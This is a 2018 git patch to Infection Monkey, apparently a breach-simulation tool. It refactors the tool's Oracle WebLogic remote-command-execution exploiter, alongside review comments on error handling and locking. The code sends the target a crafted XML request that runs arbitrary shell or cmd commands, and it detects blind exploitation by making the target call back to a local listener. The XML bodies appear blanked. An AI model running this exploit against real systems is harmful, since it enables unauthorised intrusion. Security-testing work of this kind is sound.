From 307a7c396c70f72cd2a35a2bdfdb8f2deaa8d11a Mon Sep 17 00:00:00 2001
From: Vakaris
Date: Sat, 25 Aug 2018 17:56:43 +0300
Subject: [PATCH] Notes fixed and tested
---
 infection_monkey/config.py | 3 +-
 infection_monkey/exploit/weblogic.py | 141 ++++++++++++++-------------
 2 files changed, 77 insertions(+), 67 deletions(-)
diff --git a/infection_monkey/config.py b/infection_monkey/config.py
index b5df92f55..f8094817c 100644
--- a/infection_monkey/config.py
+++ b/infection_monkey/config.py
@@ -191,7 +191,8 @@ class Configuration(object):
 # TCP Scanner
 HTTP_PORTS = [80, 8080, 443,
- 8008, 7001 # HTTP alternate
+ 8008, # HTTP alternate
+ 7001 # Oracle Weblogic default server port
 ]
 tcp_target_ports = [22, 2222,
diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py
index bd6cbc777..4169bb537 100644
--- a/infection_monkey/exploit/weblogic.py
+++ b/infection_monkey/exploit/weblogic.py
@@ -17,11 +17,11 @@ import logging
 __author__ = "VakarisZ"
 LOG = logging.getLogger(__name__)
-# How long server waits for get request
+# How long server waits for get request in seconds
 SERVER_TIMEOUT = 4
-# How long to wait for a request to go to vuln machine and then to our server from there
+# How long to wait for a request to go to vuln machine and then to our server from there. In seconds
 REQUEST_TIMEOUT = 2
-# How long to wait for response in exploitation
+# How long to wait for response in exploitation. In seconds
 EXECUTION_TIMEOUT = 15
 URLS = ["/wls-wsat/CoordinatorPortType", "/wls-wsat/CoordinatorPortType11",
@@ -55,40 +55,10 @@ class WebLogicExploiter(WebRCE):
 return exploit_config
 def exploit(self, url, command):
- empty_payload = ''' - - - - - - - {cmd_base} - - - {cmd_opt} - - - {cmd_payload} - - - - - - - - - - '''
 if 'linux' in self.host.os['type']:
- cmd_base = '/bin/sh'
- cmd_opt = '-c'
- command += ' 1> /dev/null 2> /dev/null'
+ payload = self.exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
 else:
- cmd_base = 'cmd'
- cmd_opt = '/c'
- command += ' 1> NUL 2> NUL'
-
- payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
+ payload = self.exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
 try:
 post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
 except Exception as e:
@@ -96,7 +66,7 @@ class WebLogicExploiter(WebRCE):
 print(e)
 return True
- class HTTPServer(threading.Thread):
+ class IndicationHTTPServer(threading.Thread):
 """
 Http server built to wait for GET requests. Because oracle web logic vuln is blind, we determine if we can exploit by either getting a GET request from host or not.
@@ -109,6 +79,7 @@ class WebLogicExploiter(WebRCE):
 self._stopped = False
 self.lock = lock
 threading.Thread.__init__(self)
+ self.daemon = True
 def run(self):
 class S(BaseHTTPRequestHandler):
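Review bot: `exploit` still reports success no matter what happened: the `except Exception as e:` that closes this hunk only prints the error, and the `print(e)` / `return True` lines that follow it sit in the next hunk, so a refused connection or a timeout from `post` is handed back to the caller as `True`. If a `ReadTimeout` is expected here for the same reason as in `check_if_exploitable` (the call is blind), catch that case separately and let every other exception return `False`: `except Exception as e:` / `LOG.error("Exploit request failed: %s" % e)` / `return False`. Using `LOG.error` instead of `print(e)` also matches how the rest of the class reports errors.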
@@ -132,43 +103,81 @@ class WebLogicExploiter(WebRCE):
 def check_if_exploitable(self, url):
 # Server might get response faster than it starts listening to it, we need a lock
- lock = threading.Lock()
- local_port = get_free_tcp_port()
- local_ip = get_interface_to_target(self.host.ip_addr)
- httpd = WebLogicExploiter.HTTPServer(local_ip, local_port, lock)
- httpd.daemon = True
- lock.acquire()
- httpd.start()
- lock.acquire()
- generic_check_payload = ''' - - - - - http://{lhost}:{lport} - - - - - - - - - - '''
- payload = generic_check_payload.format(lhost=local_ip, lport=local_port)
+ httpd, lock = self._start_http_server()
+ payload = self.test_payload(ip=httpd._local_ip, port=httpd._local_port)
 try:
 post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
 except exceptions.ReadTimeout:
+ # Our request does not get response thus we get ReadTimeout error
 pass
 except Exception as e:
 LOG.error("Something went wrong: %s" % e)
+ self._stop_http_server(httpd, lock)
+ return httpd.get_requests > 0
+ def _start_http_server(self):
+ lock = threading.Lock()
+ local_port = get_free_tcp_port()
+ local_ip = get_interface_to_target(self.host.ip_addr)
+ httpd = self.IndicationHTTPServer(local_ip, local_port, lock)
+ lock.acquire()
+ httpd.start()
+ lock.acquire()
+ return httpd, lock
+
+ def _stop_http_server(self, httpd, lock):
 lock.release()
 httpd.join(SERVER_TIMEOUT)
 httpd.stop()
- if httpd.get_requests > 0:
- exploited = True
- else:
- exploited = False
- return exploited
+ return True
+
+
+ @staticmethod
+ def exploit_payload(cmd_base, cmd_opt, command):
+ empty_payload = ''' + + + + + + + {cmd_base} + + + {cmd_opt} + + + {cmd_payload} + + + + + + + + + + '''
+ payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
+ return payload
+
+ @staticmethod
+ def test_payload(ip, port):
+ generic_check_payload = ''' + + + + + http://{host}:{port} + + + + + + + + + + '''
+ payload = generic_check_payload.format(host=ip,
port=port)
+ return payload
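Review bot: `check_if_exploitable` reaches into the server thread's private attributes (`httpd._local_ip`, `httpd._local_port`) even though `_start_http_server` has just computed those same values; returning them from the helper (`return httpd, lock, local_ip, local_port`) keeps the attributes private and removes the leading-underscore access. `_stop_http_server` also returns `True` unconditionally and the caller discards it, so that `return True` can simply go. The stop call sits after the `try`/`except` rather than in a `finally`, so anything raised between `_start_http_server` and the stop that is not an `Exception` subclass (a `KeyboardInterrupt`, for instance) leaves the lock held and the listener thread running; wrapping the `post` in `try: ... finally: self._stop_http_server(httpd, lock)` bounds that. Separately, the second `lock.acquire()` in `_start_http_server` has no timeout, so if the thread's `run` (outside this hunk) exits before releasing the lock the caller blocks forever; a bounded wait such as a `threading.Event` with `wait(SERVER_TIMEOUT)` would be safer, though I cannot see `run` to confirm how the lock is released.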